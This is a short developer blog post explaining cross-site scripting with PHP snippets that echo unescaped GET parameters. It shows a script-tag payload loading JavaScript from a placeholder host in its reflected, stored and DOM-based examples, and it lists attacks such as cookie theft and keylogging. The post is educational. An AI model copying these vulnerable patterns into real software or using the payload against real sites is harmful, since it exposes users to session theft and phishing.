Mohammad Reza
Posted on April 18, 2020
In this article i want to show you what is Xss attack
Cross-Site Scripting (XSS)
"XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it."
That is a very good definition that you can read more about it in owasp
But we are developers :) so let's look at it in the code
<?php
echo '<div>' . $_GET["title"] . '</div>';
echo '<div>' . $_GET["body"] . '</div>';
echo '<div>' . $_GET["footer"] . '</div>';
For example if you have somethings like it in your code you are in danger of Xss attack.
for example consider someone send
<script src="http://xxx.com/xxx.js"></script>
with get method, then you will serve sth like it in your page
<div><script src="http://xxx.com/xxx.js"></script></div>
Oh ... so someone can run js in your page :/
Ok now let's look at the different kinds of Xss attacks to be more familiar with it
1.Reflected XSS
Reflected XSS means that the payload is reflected, i.e. the server reads it from the request and includes it as part of the response as well.
/search.php?q=hello would be an example that then shows up on the page.
<?php
echo "You searched for " . $_GET["q"];
?>
But really how can it hurt you :/
That is a useful list that can aware you
1.steal credentials in non-HTTPOnly cookies.
2.send requests to a server with the user's credentials. Think XSRF
3.steal secrets that are stored in JS variables.
4.prompt the user to download content by submitting a form
5.display text that seems to come from the site owners. Think phishing.
6.display a password input, log keystrokes, and send the result to a site of your choosing
7.redirect to another site
8.get GPS/camera data if the user has granted that site access to the device
2.Stored/Persistent XSS
If you find someways to store somethings like
<script src="http://xxx.com/xxx.js"></script>
in database or somewhere that is persistent, you can call it Stored xss then you can do many things ... that means you have js file that run in special page every time :)
3.DOM XSS
let's look at this example
<script>
document.write("<b>Current URL</b> : " + document.baseURI);
</script>
if you send request like this
xxxxx.com/index.html#<script src="http://xxx.com/xxx.js"></script>
your js code will be run
And for example if you send it to the others you can easily steal the cookies from the user's browser or change the behaviour of the page on the web application as you like :)
I hope you understand Xss attack and know the different types of it
If you have any questions feel free to ask them
Have a nice time
Posted on April 18, 2020
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.